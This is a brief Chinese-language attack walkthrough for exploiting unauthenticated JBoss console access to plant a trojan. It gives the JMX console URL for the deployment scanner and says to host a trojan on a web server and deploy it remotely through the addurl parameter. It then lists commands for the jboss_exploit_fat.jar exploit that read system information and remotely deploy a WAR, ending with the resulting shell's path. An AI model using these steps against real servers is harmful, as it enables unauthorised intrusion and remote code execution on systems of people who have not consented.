1,Jboss未授权访问部署木马
发现存在Jboss默认页面,点进控制页
点击 Jboss.deployment 进入应用部署页面
也可以直接输入此URL进入 :8080//jmxconsole/HtmlAdaptoraction=inspectMBean&name=jboss.deployment:type=DeploymentScanner,flavor=URL
搭建远程木马服务器,可以用apache等web服务器来搭建,通过addurl参数进行木马的远程部署
部署成功,访问木马地址
最后附上一个jboss未授权访问EXP,备用,使用说明 1. 查看系统名称 java -jar jboss_exploit_fat.jar -i :8080/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSName 2. 查看系统版本 java -jar jboss_exploit_fat.jar -i :8080/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSVersion 3.远程部署war java -jar jboss_exploit_fat.jar -i :8080/invoker/JMXInvokerServlet invoke jboss.system:service=MainDeployer deploy 获得shell地址: :8080/no/index.jsp